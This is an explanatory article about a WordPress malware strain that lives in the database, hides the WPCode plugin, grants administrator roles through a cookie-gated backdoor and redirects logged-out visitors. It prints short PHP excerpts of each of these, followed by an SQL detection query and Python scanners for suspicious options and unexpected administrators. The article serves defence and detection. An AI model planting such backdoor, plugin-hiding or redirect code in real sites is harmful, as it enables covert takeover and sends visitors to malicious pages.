WordPress, a leading content management system (CMS), powers over 40% of all websites on the internet. This vast reach has unfortunately made it a frequent target for cyberattacks, including malware. Recently, a new type of malware infection in WordPress installations has come to light, slipping past major security scanners and compromising websites through hidden admin users, redirecting non-logged-in users, and tampering with core settings. This article breaks down the technical details of this malware, its impact, and provides simple explanations of jargon to make it more accessible for everyone.
The Emergence of the WordPress Malware
WordPress users and developers often rely on security plugins and services like Wordfence, iThemes Security, and All-In-One WP Security & Firewall to detect malicious activities and keep their websites safe. Despite these tools, reports from security-conscious WordPress site administrators revealed that a sophisticated type of malware has been able to bypass many major security scanners and hide within the core database of infected WordPress websites.
What’s alarming about this malware is that it uses advanced techniques to hide itself from the site’s admin and security plugins, as well as create hidden administrative accounts without the knowledge of the legitimate site owner.
What Makes This Malware So Dangerous?
The malware exploits weak passwords and security vulnerabilities in plugins to inject malicious code directly into the WordPress database. The infected websites redirect visitors (who aren’t logged in) to malicious external URLs. Moreover, it creates hidden admin users, effectively granting the attackers ongoing control over the site.
Several developers and website administrators have voiced concerns about this new strain of malware on forums like Reddit, providing insights and warnings for the larger WordPress community. A recent Reddit thread, titled “Malware WordPress Installations: Hidden Admin Users, Redirects, Plugin Hiding Detected (14 Major Scanners),” highlights the malware’s stealthy nature, going undetected even by some of the best-known security plugins.
Admin Panel Hijacking
In this attack, the malware modifies the admin interface, the control panel that WordPress site owners use to manage their sites. It hides specific security-related plugins, such as “Code Snippets” (the sample below targets the WPCode plugin: the hidden element ids begin with wpcode and the plugin file removed from the list is insert-headers-and-footers/ihaf.php), preventing the admin from reviewing compromised plugins or seeing critical security notifications.
Below is a sample of the malicious code that hides the plugin ($some_array is shown as it appeared in the sample; where it comes from is not part of the excerpt):
// Only act for administrators, and only while the attacker's own "show_all" switch is absent.
if (current_user_can('administrator') && !array_key_exists('show_all', $some_array)) {
    // Print CSS on admin pages so the plugin's menu entry, admin-bar item and notice never render.
    add_action('admin_print_scripts', function () {
        echo '#toplevel_page_wpcode { display: none; }';
        echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
        echo '#wpcode-notice-global-review_request { display: none; }';
    });
    // Filter the plugin list so the plugin's row disappears from the Installed Plugins screen.
    add_filter('all_plugins', function ($plugins) {
        unset($plugins['insert-headers-and-footers/ihaf.php']);
        return $plugins;
    });
}
This snippet hides the “Code Snippets” plugin from the WordPress dashboard in two ways: the CSS removes its admin-menu entry, admin-bar item and review notice from view, and the all_plugins filter drops its row from the Installed Plugins list, keeping site owners unaware of the malware’s presence.
Creation of Hidden Admin Users
One of the most dangerous aspects of this malware is its ability to create hidden admin users without the site owner’s knowledge. By reading cookie data and injecting admin credentials directly into the database, the attackers can create new admin users who can log into the site and continue the attack without raising suspicion.
Here’s an example of the malicious code that creates hidden admin users (_gcookie() and $_pwsa are the malware’s own cookie helper and stored secret, not WordPress functions):
// Gate on a cookie-supplied password matching the secret the attacker planted.
if (!empty($_pwsa) && _gcookie('pw') === $_pwsa) {
    // A second cookie selects the action; 'admin' promotes the current user.
    switch (_gcookie('c')) {
        case 'admin':
            $user->set_role('administrator');
            break;
    }
}
This code compares the “pw” cookie with a password the malware has stored; if they match, the “c” cookie selects an action, and for “admin” the current user is given the administrator role on the website. Once in place, the attacker can manipulate the site further, create more admin accounts, or inject even more malicious code.
Redirecting Non-Logged-In Users
Another feature of the malware is its ability to redirect non-logged-in visitors (users who aren’t signed into the WordPress admin panel) to external malicious websites. The malware uses IP address tracking to avoid redirecting the same IP address multiple times within a 24-hour period. This makes the attack more covert, as some users may visit the website and never encounter a redirect, while others may unknowingly end up on harmful websites.
Here’s an example of the redirect code used in this malware ($s holds a row read from the database, and _user_ip() is the malware’s own helper):
if (!is_user_logged_in()) {
    // The visitor's IP feeds the once-per-24-hours check described above (not part of this excerpt).
    $ip = _user_ip();
    // The destination is stored base64-encoded, so it does not look like a URL in the database.
    $redirect_url = base64_decode($s[0]['txt']);
    if (substr($redirect_url, 0, 4) === 'http') {
        header("Location: $redirect_url");
        exit;
    }
}
This code decodes the malicious URL from a database entry and redirects non-logged-in users to the external site. The attackers can use this redirection to deliver malware, phishing attacks, or other harmful content.
Hidden Database Entries
What makes this malware especially tricky to detect is its ability to hide malicious code within normal WordPress database entries. The malware injects code into the wp_options table, specifically targeting option rows such as wpcode_snippets, siteurl, and redirection_options. These rows are typically used for legitimate WordPress functions, so most security scanners overlook them.
By injecting malicious code into these entries, the malware can execute harmful actions without raising alarms in traditional file scans. Here’s an SQL query that can help identify suspicious patterns in the database:
SELECT option_name, option_value
FROM wp_options
WHERE option_name IN ('siteurl', 'wpcode_snippets', 'wpseo', 'redirection_options')
  AND (
        option_value LIKE '%<script%'
     OR option_value LIKE '%eval%'
     OR option_value LIKE '%base64_decode%'
     OR option_value LIKE '%document.write%'
  );
This query searches for common indicators of malware, such as <script> tags, eval() functions, and base64_decode() calls, all of which are commonly used by attackers to hide malicious scripts in the database. Replace the wp_ prefix if your installation uses a custom table prefix, and review every hit by hand: the LIKE patterns are deliberately broad (for instance, %eval% also matches ordinary words such as “evaluate”), and a base64-encoded redirect URL matches none of them.
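As an added example (not code from the article or the Reddit thread), the following Python script applies the same option names and indicator strings to rows exported from wp_options and goes one step further than the query: it base64-decodes long encoded runs, because the redirect code above stores its destination URL base64-encoded and such a row matches none of the plain-text patterns. All function names and the sample rows are constructed for this illustration.

```python
import base64
import re

# Option names and indicator strings taken from the SQL query above.
SUSPECT_OPTIONS = {"siteurl", "wpcode_snippets", "wpseo", "redirection_options"}
INDICATORS = ("<script", "eval", "base64_decode", "document.write")
# A run of 16+ base64 alphabet characters with optional padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_urls(value):
    """Return http(s) URLs that appear only after base64-decoding runs inside an option value."""
    found = []
    for m in B64_RUN.finditer(value):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: skip
        if text.startswith("http"):
            found.append(text)
    return found


def scan_options(rows):
    """rows: iterable of (option_name, option_value). Returns a list of (option_name, reason)."""
    findings = []
    for name, value in rows:
        if name not in SUSPECT_OPTIONS:
            continue
        for ind in INDICATORS:  # same broad substring match as the SQL LIKE patterns
            if ind in value:
                findings.append((name, f"contains {ind!r}"))
        for url in decoded_urls(value):
            findings.append((name, f"base64-encoded URL {url}"))
    return findings


# Constructed sample rows shaped like a wp_options export (not real site data).
SAMPLE_ROWS = [
    ("siteurl", "https://example.com"),
    ("wpcode_snippets", 'a:1:{i:0;a:1:{s:4:"code";s:33:"<?php eval(base64_decode($s[0]));";}}'),
    ("redirection_options", base64.b64encode(b"http://malicious.example/landing").decode()),
    ("blogname", "eval this"),  # not in the watched set, so ignored
]

if __name__ == "__main__":
    for name, reason in scan_options(SAMPLE_ROWS):
        print(f"{name}: {reason}")
```

Treat every finding as a lead to inspect, not a verdict: legitimate options can contain base64 or the word “eval”.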
Why Are So Many Security Plugins Failing?
A major concern expressed by many users is the fact that this malware can evade detection by even the most popular security plugins. According to the Reddit post, the following scanners failed to detect the malware:
- iThemes Security
- All-In-One WP Security & Firewall
- Anti-Malware Security and Brute-Force Firewall (GOTMLS.NET)
- Quttera Web Malware Scanner
- Exploit Scanner
- WP Cerber Security
Even though these scanners have a reputation for being thorough, they weren’t able to flag the malicious code injected into the WordPress database. This has raised questions about the effectiveness of these tools and whether they need to improve their scanning methods to detect such sophisticated attacks.
A Word About Security Plugins
Security plugins like Wordfence and iThemes Security are designed to help protect your site by detecting vulnerabilities, scanning for malware, and blocking suspicious activities. However, these tools typically focus on scanning files for known malware signatures or unusual behavior.
In this case, the malware doesn’t alter the core WordPress files directly but instead injects malicious code into the database, which is much harder to detect. The malware also uses legitimate WordPress functions like wp_insert_user() and standard database queries to hide itself, which allows it to fly under the radar of traditional security scans.
How the Malware Works: A Step-by-Step Breakdown
Let’s break down how this malware infects a WordPress site in more detail:
1. Initial Compromise
The attackers exploit weak passwords or unpatched vulnerabilities in WordPress plugins to gain unauthorized access to the site. Once they have admin-level access, they begin their attack.
2. Hidden Admin Users
The malware creates hidden admin users by injecting malicious code into the WordPress database. These users don’t show up in the admin panel but have full control over the site.
3. Tampering with the Admin Interface
The malware then hides security plugins or notifications in the WordPress admin panel to prevent the site owner from noticing the infection. It uses code like the one mentioned earlier to hide plugins like “Code Snippets.”
4. Redirecting Visitors
Next, the malware injects malicious code into the database to redirect non-logged-in visitors to external, harmful websites. This redirection doesn’t affect logged-in users, making it harder for site owners to detect.
5. Evasion of Security Scans
Since the malware injects code into the WordPress database and uses legitimate functions, it evades traditional file-based security scans. Most security plugins focus on scanning files for malware, not database entries.
6. Persistence
The malware ensures persistence by keeping hidden admin users active, allowing the attackers to regain access to the site even if some of their malicious code is removed. They can continue to update their malware or install new types of malicious software on the site.
Combating the Malware: What Can You Do?
If you manage a WordPress website, it’s crucial to take action to secure your site against this type of malware. Here are some steps you can take:
1. Use Strong Passwords
One of the most common ways attackers gain access to WordPress sites is by exploiting weak passwords. Make sure all admin accounts use strong, unique passwords, and consider enabling two-factor authentication (2FA) for an additional layer of security.
2. Keep WordPress, Plugins, and Themes Updated
Outdated plugins, themes, or WordPress core files can contain vulnerabilities that attackers exploit. Always keep your WordPress installation, themes, and plugins up to date to patch any security flaws.
3. Scan Your Database
Most WordPress security plugins focus on file scans, but this malware hides in the database. Regularly scan your database for suspicious entries, especially in the wp_options table. You can use the SQL query mentioned earlier to search for malware patterns.
4. Monitor Admin Users
Keep an eye on your admin user accounts. If you notice any new or suspicious users, investigate immediately. A plugin like Activity Log can help track admin activity on your site.
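As an added example (not from the article), this Python check audits exported wp_users and wp_usermeta rows for the administrator role, covering both the hidden-admin code shown earlier and this step. The set_role('administrator') call in the malware sample writes that role into the user’s wp_capabilities meta row, while the admin-screen hiding works through display filters, so the database row still shows the extra administrator. The sample rows and the known_admins set are constructed; the wp_ table prefix is an assumption for a default install.

```python
import re

# Role names inside a PHP-serialized wp_capabilities value, e.g.
# a:1:{s:13:"administrator";b:1;} -> ["administrator"]. Only roles set to true (b:1) count.
ROLE_RE = re.compile(r's:\d+:"([^"]+)";b:1;')


def roles_from_capabilities(serialized):
    """Return the roles granted by a serialized wp_capabilities value."""
    return ROLE_RE.findall(serialized)


def find_unexpected_admins(users, usermeta, known_admins, prefix="wp_"):
    """Return wp_users rows that hold 'administrator' but whose login is not in known_admins.

    users:    list of dicts with ID, user_login, user_email, user_registered (wp_users export)
    usermeta: list of (user_id, meta_key, meta_value) tuples (wp_usermeta export)
    prefix:   table prefix; the capabilities key is '<prefix>capabilities' (wp_ assumed)
    """
    cap_key = prefix + "capabilities"
    admin_ids = {
        uid for uid, key, value in usermeta
        if key == cap_key and "administrator" in roles_from_capabilities(value)
    }
    return [u for u in users
            if u["ID"] in admin_ids and u["user_login"] not in known_admins]


# Constructed sample rows (not from any real site).
SAMPLE_USERS = [
    {"ID": 1, "user_login": "owner", "user_email": "owner@example.com",
     "user_registered": "2021-03-01 10:00:00"},
    {"ID": 2, "user_login": "editor", "user_email": "editor@example.com",
     "user_registered": "2022-06-15 09:30:00"},
    {"ID": 3, "user_login": "wp_support", "user_email": "support@example.net",
     "user_registered": "2024-09-28 03:12:44"},
]
SAMPLE_USERMETA = [
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
    (3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),  # what set_role() leaves behind
    (3, "wp_user_level", "10"),
]
KNOWN_ADMINS = {"owner"}  # the logins the site owner recognises

if __name__ == "__main__":
    for user in find_unexpected_admins(SAMPLE_USERS, SAMPLE_USERMETA, KNOWN_ADMINS):
        print(f"unexpected administrator: {user['user_login']} <{user['user_email']}> "
              f"registered {user['user_registered']}")
```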
5. Check for Plugin Tampering
If your security plugins disappear from the WordPress admin panel, it could be a sign of malware. Manually check the wp-content/plugins directory to ensure that all security plugins are still present and haven’t been tampered with.
6. Use More Advanced Security Tools
While popular security plugins like Wordfence and iThemes Security are a good starting point, consider using more advanced tools like MalCare or SecuPress, which are designed to detect more sophisticated malware and provide deeper scans.
7. Back Up Regularly
In case of an attack, having a recent backup of your website can be a lifesaver. Make sure you’re regularly backing up both your site files and your database. Plugins like UpdraftPlus or BackupBuddy can automate this process for you.
Security Plugin Developers: A Call for Improved Detection
As malware continues to evolve, security plugin developers must step up and improve their detection methods. Current tools focus too heavily on scanning files and often overlook potential threats hiding in the WordPress database. To combat these advanced attacks, security plugins should:
- Implement deeper database scanning for common malware injection patterns.
- Monitor unusual admin activity, such as the creation of hidden admin users.
- Provide site owners with tools to detect and remove suspicious plugin behavior.
In response to this malware, developers of tools like SecuPress have already begun working on updates to better protect against this type of attack. However, it’s crucial that all major security tools improve their ability to detect malicious database entries and hidden users.
Conclusion: Staying Safe in a Dangerous Digital Landscape
The malware currently plaguing WordPress installations is a reminder that attackers are constantly evolving their methods, finding new ways to infiltrate websites and evade detection. While security plugins remain an essential part of keeping your WordPress site safe, relying solely on these tools isn’t enough. Website owners must take proactive steps to secure their sites by using strong passwords, keeping software up to date, and regularly scanning their databases for suspicious activity.
By staying vigilant, monitoring admin activity, and using advanced security tools, you can protect your WordPress site from this new wave of malware and ensure that your visitors have a safe, secure experience.
In the ever-changing world of cybersecurity, knowledge is power. The more you know about the threats facing your website, the better equipped you are to defend against them. Keep learning, stay updated, and remember: a secure website is a successful website.